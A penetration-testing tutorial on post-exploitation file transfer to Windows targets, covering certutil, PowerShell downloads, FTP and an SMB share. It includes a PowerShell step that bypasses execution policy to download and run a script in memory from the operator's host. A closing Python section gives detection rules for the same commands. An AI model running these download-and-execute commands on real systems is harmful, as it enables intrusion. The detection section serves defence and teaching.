Part of penetration testing (post-exploitation) requires you to transfer files from your machine to the target machine. Here are some commands we can use to download files on Windows.

HTTP

1. Set up a Web Server

  • python3 -m http.server 8888
  • python2.7 -m SimpleHTTPServer 8888

2. We will transfer a file named VK9-Sec.jpg

CertUtil

1. From CMD, run the following to download a file

  • certutil -urlcache -split -f "http://ip-addr:port/file" [output-file]
  • certutil -urlcache -split -f "http://192.168.0.13:8888/VK9-Sec.jpg" VK9-Sec.jpg
  • dir VK9-Sec.jpg

PowerShell (IWR)

1. In PowerShell, run

  • IWR http://192.168.0.13:8888/VK9-Sec.jpg -OutFile VK9-Sec.jpg
  • dir VK9-Sec.jpg

2. It can also be run from CMD

  • powershell.exe IWR http://192.168.0.13:8888/VK9-Sec.jpg -OutFile VK9-Sec.jpg
  • dir VK9-Sec.jpg

PowerShell (Invoke-WebRequest)

1. In PowerShell, run

  • Invoke-WebRequest -URI 'http://192.168.0.13:8888/VK9-Sec.jpg' -Outfile .\VK9-Sec.jpg
  • dir VK9-Sec.jpg

2. This can also be run from CMD

  • powershell.exe Invoke-WebRequest -URI 'http://192.168.0.13:8888/VK9-Sec.jpg' -Outfile .\VK9-Sec.jpg
  • dir VK9-Sec.jpg

Fileless download

We can download a script and execute it from memory using PowerShell, without writing it to disk.

1. First we will set up a web server containing Sherlock.ps1 to execute as a test

  • git clone https://github.com/rasta-mouse/Sherlock.git
  • cd Sherlock
  • python3.9 -m http.server 9999

2. On the remote machine, execute the following

PowerShell

  • powershell -ep bypass
  • IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.16:9999/Sherlock.ps1');Find-AllVulns

CMD

  • powershell.exe "iex(new-object net.webclient).downloadString('http://192.168.0.16:9999/Sherlock.ps1');Find-AllVulns"

FTP

Pyftpdlib Python library

FTP is another common method of file transfer, and FTP clients are usually installed by default on Windows machines.

1. On your local Linux server, install the Python library used to set up the FTP server (you can run it without sudo as well)

  • sudo pip3 install pyftpdlib
  • sudo python3 -m pyftpdlib -p 21

2. From the remote Windows machine we can connect using FTP.

  • Open 192.168.0.16
  • User: anonymous
  • Password: anonymous

3. Once logged in successfully, we can run FTP commands to inspect the files in the directories and download them to our machine

  • HELP
  • dir
  • GET VK9-Sec.jpg

Note that the transfer completed. If we check our directory, we will see the downloaded file

  • dir

SMB

We can also use the SMB protocol to transfer files.

1. Start an SMB server in Kali

  • impacket-smbserver EVILSHARE ~/Desktop -smb2support

2. From the remote machine, connect to the SMB server we just set up. We can see our share "EVILSHARE"

  • net view \\192.168.0.13

3. List the files in the share

  • dir \\192.168.0.13\EVILSHARE

4. Download the file to the remote machine

  • copy \\192.168.0.13\EVILSHARE\VK9-Sec.jpg
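
Detection

Each transfer method above leaves a recognisable process command line. The following is an added example, not part of the original article: a small Python matcher that flags the certutil, IWR/Invoke-WebRequest, in-memory IEX and SMB copy patterns shown on this page. The rule names, the sample command lines and the host 10.0.0.5 are constructed for illustration.

```python
import re

# Rule name -> pattern, matched against process-creation command lines
# (for example Sysmon Event ID 1, or Security Event ID 4688 with
# command-line auditing enabled). Rule names are illustrative.
RULES = {
    "certutil_urlcache_download": re.compile(
        r"\bcertutil(?:\.exe)?\b.*[-/]urlcache\b.*https?://", re.I),
    "powershell_web_download_to_disk": re.compile(
        r"\b(?:iwr|invoke-webrequest)\b(?=.*https?://)(?=.*-outfile\b)", re.I),
    "powershell_download_and_execute": re.compile(
        r"\b(?:iex|invoke-expression)\b.*\.downloadstring\s*\(", re.I),
    "copy_from_unc_path_by_ip": re.compile(
        r"\b(?:copy|xcopy|robocopy)\b.*\\\\\d{1,3}(?:\.\d{1,3}){3}\\", re.I),
}


def classify(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan(cmdlines):
    """Map each suspicious command line to the rules it triggered."""
    return {c: hits for c in cmdlines if (hits := classify(c))}


# Constructed sample events: commands in the shape this page uses,
# followed by three benign look-alikes that must not be flagged.
SAMPLE_CMDLINES = [
    r'certutil -urlcache -split -f "http://10.0.0.5:8888/VK9-Sec.jpg" VK9-Sec.jpg',
    r"powershell.exe IWR http://10.0.0.5:8888/VK9-Sec.jpg -OutFile VK9-Sec.jpg",
    r"powershell.exe Invoke-WebRequest -URI 'http://10.0.0.5:8888/VK9-Sec.jpg' -Outfile .\VK9-Sec.jpg",
    r'''powershell.exe "iex(new-object net.webclient).downloadString('http://10.0.0.5:8888/Sherlock.ps1');Find-AllVulns"''',
    r"cmd.exe /c copy \\10.0.0.5\EVILSHARE\VK9-Sec.jpg",
    r"certutil -hashfile VK9-Sec.jpg SHA256",
    r"powershell.exe Invoke-WebRequest -Uri https://intranet.example/health",
    r"cmd.exe /c copy C:\temp\a.txt D:\backup\a.txt",
]

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_CMDLINES).items():
        print(f"{', '.join(hits):35} {cmd}")
```

Commands typed into an already running cmd.exe or PowerShell session do not create a new process, so these rules only see them when they appear on a launch command line. Interactive PowerShell use is better covered by script block logging (Event ID 4104).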